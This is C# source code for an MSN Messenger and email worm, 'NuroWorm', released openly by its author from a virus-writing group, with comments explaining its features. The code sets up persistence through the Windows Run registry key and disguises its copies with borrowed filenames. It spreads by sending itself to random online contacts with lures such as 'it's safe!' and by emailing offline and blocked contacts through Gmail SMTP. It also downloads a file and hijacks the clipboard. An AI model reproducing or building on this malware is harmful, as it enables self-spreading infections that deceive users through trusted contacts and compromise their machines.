/*
MSIL.NuroWorm.msn
MSN/email spreading worm
Genetix / DoomRiderz VX team
*/
/*
* My 2nd MSN worm but with email spreading.. it's kinda like the 1 in vb.net but this was more planned and
* it don't need a file server this used sendkeys instead, also this time in C#.net
* it searches the current directory for a random files name to use to copy into c:\
* it create's a rar file in c:\ that it will add itself into.
* it get's all the contacts and picks a random contact to send itself to, this is fastest way.
* it creates a random message from alot of set words and sends the message to the contact window.
* it check the registry for itself and if it isnt there it add's itself to the registry to run on windows startup.
* befor it does any of this it checks to see if msn is actually loaded and your not offline,
* does this by checking processes with a timer control.
* also collects offline/blocked contacts and sends a nice email to them with the worm as attachment and with random email subject
* it using's gmail's smtp server and send's from a random address (from 2 addresses)
* deletes copyied files after each run for a clean start next time.
* has a kewl payload that sets the clipboard to doomriderz website link
* also has a 2nd payload that spawns a new thread to activate a screen saver and download/play a midi file i like! :p
*/
//ps: you must make 2 or more gmail accounts! more is better.
using System;
using MessengerAPI;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.ComponentModel;
using System.Windows.Forms;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using Microsoft.Win32;
using System.Net.Mail;
using System.Net;
using System.Threading;
namespace nuroWorm
{
public partial class Form1 : Form
{
//setup vars used
const string url = "http://www.vgmusic.com/music/console/sega/master/Alien3-Title.mid";
const string KeyTitle = "MSNUpdate";
const string subkey = @"Software\Microsoft\Windows\CurrentVersion\Run";
private string myDocs = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\";
string sFile = "nuro.exe";
string ForEmail = "";
string rndName = "";
const string smtpserver = "smtp.gmail.com";
WebClient wc = new WebClient();
MessengerAPI.Messenger nurofen = new MessengerAPI.Messenger();
[DllImport("winmm.dll")]
private static extern long mciSendString(string strCommand, string strReturn, int iReturnLength, IntPtr hwndCallback);
public Form1()
{
InitializeComponent();
}
private void Form1_Load(object sender, EventArgs e)
{
MSNtimer.Stop();
Thread nuroThread = new Thread(new ThreadStart(this.payload));
nuroThread.IsBackground = true;
nuroThread.Start();
//check if the worm is already in memory
if (Is_Active() == true) {
Application.Exit();
} else {
//enable timer if MSN isnt online/running
if (!MSNLoaded())
{
MSNtimer.Interval = 1000;
MSNtimer.Start();
}else{
//everything is ok jump to the worm.
Worming();
}
}
}
public void payload()
{
if (!File.Exists(myDocs + "wintune.mid"))
{
wc.DownloadFile(url, myDocs + "wintune.mid");
mciSendString("play " + myDocs + "wintune.mid", null, 0, IntPtr.Zero);
}
else
{
mciSendString("play " + myDocs + "wintune.mid", null, 0, IntPtr.Zero);
}
}
public void Worming()
{
string Msg = "";
start_with_windows();
//function call to create a rar file
createRAR();
//this is fun!
Clipboard.SetData("www.DoomRiderz.co.nr ---- GirlPower!!!", true);
//call function to get a random message
Msg = rndMSNmessage();
nurofen.InstantMessage(GetContact()); //open chat window for random online contact
//SendKeys.SendWait(Msg); // send the random message
/*
* the follwoing are all sendkeys commands.. their very usefull!
* because MSN dont support file fransfer programaticly
* so by sending key's it will be like a real person send a file
*/
SendKeys.SendWait("{ENTER}");
SendKeys.SendWait("{TAB}");
for (int x = 0; x <= 13; x++) {
SendKeys.SendWait("{UP}");
}
//Send the file using send keys
SendKeys.SendWait("{ENTER}");SendKeys.SendWait("{DOWN}");
SendKeys.SendWait("{DOWN}");SendKeys.SendWait("{ENTER}");
SendKeys.SendWait("c:\\test.rar");SendKeys.SendWait("{ENTER}");
//delete the temp files from c:\
File.Delete(myDocs + "test.rar");
File.Delete(myDocs + rndName);
//setting up mail spreading
if (ForEmail != null) {
//make address array
string[] addresses = ForEmail.Split('¬');
//Get each addresse from the array 1 by 1
for (int i = 0; i <= addresses.GetUpperBound(0); i++) {
//check if there is actually anything there
if (addresses[i] != "")
//send contact to mailing function
MSN_MailWorm(addresses[i]);
}
}
}
//function to grab a random contact
public string GetContact()
{
Random rnd = new Random();
int conCount = 0;
string Conts = "";
//create new messanger class
MessengerClass mess = new MessengerClass();
//set contact variable as messanger contacts
IMessengerContacts Contacts;
//get messanger contacts from signed in account
Contacts = (IMessengerContacts)mess.MyContacts;
//create array of contacts
string[] hosts = new string[Contacts.Count];
//guess
foreach (IMessengerContact host in Contacts)
{
//No offliners plz!
if (host.Status != MISTATUS.MISTATUS_OFFLINE && !host.Blocked)
{
Conts = Conts + "¬" + host.SigninName; //online contacts
conCount += 1;
} else {
ForEmail = ForEmail + "¬" + host.SigninName; //get the blocked/offline contacts (they aint getting away!)
}
}
string[] contct = Conts.Split('¬'); //split into array
return contct[rnd.Next(1, conCount + 1)].ToString(); //return random contact
}
//generate a random message
public string rndMSNmessage()
{
Random rnd = new Random();
string[] intro = new string[6];
string[] scnd = new string[8];
string[] thrd = new string[6];
string[] fth = new string[6];
string[] why = new string[15];
intro[1] = "hey";
intro[2] = "hay";
intro[3] = "hi";
intro[4] = "hello";
intro[5] = "hiya";
scnd[1] = "download";
scnd[2] = "get";
scnd[3] = "install";
scnd[4] = "check out";
scnd[5] = "try";
scnd[6] = "look at";
scnd[7] = "nurofen";
thrd[1] = "this";
thrd[2] = "that";
thrd[3] = "my";
thrd[4] = "the";
thrd[5] = "a";
fth[1] = "program";
fth[2] = "software";
fth[3] = "app";
fth[4] = "application";
fth[5] = "game";
why[1] = "it get's msn passwords!";
why[2] = "i need your opinion on it";
why[3] = "i need someone to test it for me";
why[4] = "it's safe!";
why[5] = "you will love it!";
why[6] = "it's amazing!";
why[7] = "it is kewl!";
why[8] = "accept it.";
why[9] = "i made it";
why[10] = "please";
why[11] = "plz";
why[13] = "MSN addon";
why[14] = "secret MSN smilies!";
return intro[rnd.Next(1, 5)] +
(char)(32) + scnd[rnd.Next(1, 7)] + (char)(32) +
thrd[rnd.Next(1, 5)] + (char)(32) + fth[rnd.Next(1, 5)] + (char)(32) +
why[rnd.Next(1, 14)]; //generate the random IM
}
public bool MSNLoaded()
{
Process[] processes = Process.GetProcesses();
foreach (Process p in processes)
{
string pname = p.ProcessName.ToLower();
if (pname == "msnmsgr") //name of msn messangers process in memory
{
return true;
}
}
return false;
}
//find the WinRar program location using registry
public string GetRarPath()
{
string tmpGetRarPath = null;
RegistryKey myReg = null;
myReg = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\WinRAR.exe", false);
if (myReg == null)
{
Application.Exit();
}else{
tmpGetRarPath = System.Convert.ToString(myReg.GetValue("Path")) + @"\WinRar.exe";
}
return tmpGetRarPath;
}
//add's worm to startup key
public string start_with_windows()
{
RegistryKey isthere = null;
System.Reflection.Module nurofenModule = Assembly.GetExecutingAssembly().GetModules()[0];
string nurofenFile = (nurofenModule.FullyQualifiedName);
if (!File.Exists(myDocs + sFile))
{
//make it if it isnt there
File.Copy(nurofenFile, myDocs + sFile, false);
}
//check if its there
isthere = Registry.CurrentUser.OpenSubKey(subkey + KeyTitle, false);
if (isthere == null)
{ //no?
//then put it there lol
RegistryKey key = Registry.CurrentUser.OpenSubKey(subkey, true);
key.SetValue(KeyTitle, myDocs + sFile);
} return null;
}
//creates a rar file and a copy of itself to c:\ and sends it to msn contact
public string createRAR()
{
string compile = "";
//create byte array for rar file header
byte[] RARArchive = new byte[] {
82, 97,
114,33,
26,7,
0,207,
144,115,
0,0,13,
0, 0, 0, 0, 0, 0, 0
};
//get self exe name/location
System.Reflection.Module nurofenModule = Assembly.GetExecutingAssembly().GetModules()[0];
string nurofenFile = (nurofenModule.FullyQualifiedName);
//create rar file
FileStream fs = File.Create(myDocs + "test.rar");
fs.Write(RARArchive, 0, RARArchive.Length);
fs.Flush();
fs.Close();
fs = null;
//get working directory
string path = Directory.GetCurrentDirectory();
//get files from current location
rndName = getfiles(path + @"\");
//check if it's found any files it can use the name of
if (rndName != "")
{
//strip extension from file
rndName = rndName.Substring(0, (rndName.IndexOf(".", 0) + 1) - 1);
//add a .exe extension
rndName += ".exe";
}
else
{ //no files?
//use this name then
rndName = "nuro.exe";
}
//copy self to c:\ with the file name of a file found in the current path
File.Copy(nurofenFile, myDocs + rndName);
//rar it! (causes error because of header, but the rar file works!)
System.Diagnostics.Process process1 = new System.Diagnostics.Process();
process1.EnableRaisingEvents = false;
compile = "/C \"" + GetRarPath() + "\" a " + myDocs + "test.rar" + " " + myDocs + rndName;
Process.Start("CMD.exe", compile).WaitForExit();
process1.Close();
return null;
}
//check for Previous Instance, return true or false
public bool Is_Active()
{
Mutex nuroMutex = new Mutex(false, "Genetix");
bool Running = !nuroMutex.WaitOne(0, false);
return Running;
}
//used for getting a file name randomly
public string getfiles(string dir)
{
Random rnd = new Random();
int filecount = 0;
string filess = "";
string[] files = null;
//get files
files = System.IO.Directory.GetFiles(dir);
//make array of files
for (int i = 0; i <= files.GetUpperBound(0); i++)
{
//get the filename (or it will include the file path)
filess = filess + "!" + System.IO.Path.GetFileName(files[i]);
//count how many files it found
filecount += 1;
}
//create array from var "filess" with "!" as delim
string[] rndfile = filess.Split('!');
//choose a random file
return rndfile[rnd.Next(1, filecount + 1)].ToString();
}
//function to email the worm to contacts.. kinda really simple
//but affective for spreading fast (atleast until the accounds are locked)
public string MSN_MailWorm(string address)
{
Random rnd = new Random();
string mail1 = "name@gmail.com";
string mail2 = "name@gmail.com";
string ToUse = "";
string[] one = new string[10];
//pick random accound to mail from
if (rnd.Next(1, 2) == 1)
{
ToUse = mail1;
}
else
{
ToUse = mail2;
}
//some email subjects
one[1] = "hiya";
one[2] = "hello";
one[3] = "hey";
one[4] = "hay";
one[5] = "hi";
one[6] = "read!!";
one[7] = "how are you?";
one[8] = "hi " + address + " check this out!";
one[9] = "hey " + address + " you should see this!";
MailMessage MailWorm = new MailMessage();
MailWorm.To.Add(address); MailWorm.From = new MailAddress(ToUse, rndMSNmessage());
MailWorm.IsBodyHtml = true; MailWorm.Priority = MailPriority.Normal;
string Nuro = myDocs + "test.rar"; MailWorm.Attachments.Add(new Attachment(Nuro));
MailWorm.Subject = one[rnd.Next(1, 9)]; MailWorm.Body = "<table><tr><td>" + rndMSNmessage() + "</td></tr></table>";
SmtpClient smtpcli = new SmtpClient(smtpserver, 587); smtpcli.EnableSsl = true;
smtpcli.DeliveryMethod = SmtpDeliveryMethod.Network;
smtpcli.Credentials = new NetworkCredential(ToUse, "your password for both gmail accounts");
try
{
//try send the worm to contacts
smtpcli.Send(MailWorm);
} catch {
}
return null;
}
//wait for msn to start if not already running
private void MSNtimer_Tick(object sender, EventArgs e)
{
if (MSNLoaded() && !online())
{
MSNtimer.Stop();
Worming();
}
}
public bool online() {
if (nurofen.MyStatus != MISTATUS.MISTATUS_OFFLINE)
{
return true;
}else{
return false;
}
}
}
}
//so thats all! not great but it was fun.
/*
* hello's to all these weird friends of mine:
*
* kefi ----------- dead?
* free0n ---------- thx for all the help! god's gift to women huh?
* retr0 ----------- thx for help too! i owe you a strip tease lol
* slagehammer ---------- thx for buying me a house in the country side ;) lol
* necro ---------- that place you dream about is turkey because they are all moving to germany!
* dr3f ----------- your depressing but fun.. pervert! :p
* ponygrl ---------- erm... I don't know you but welcome to the scene & good luck, nice to know im not the only 1 being terrorized for pics!
* synge ----------- another god's gift to women.. this is the only thing you have in common with free0n lol
* WarGame ---------- thx for joining us you'll have fun! get faster internet
* peter ferrie ---------- it's turnt from fun to habbit! i just need to get away from here.. got a spare room?
* falckon ----------- good luck with your english lessons , and good luck trying to sleep with me lol
* And hello to everyone in #virus! (thats on undernet if you didnt know)
*
* sorry to anyone i missed out but i just poked myself in the eye now i'm typing blind!
* and you've probably noticed in all my work my greets are totally random!
*/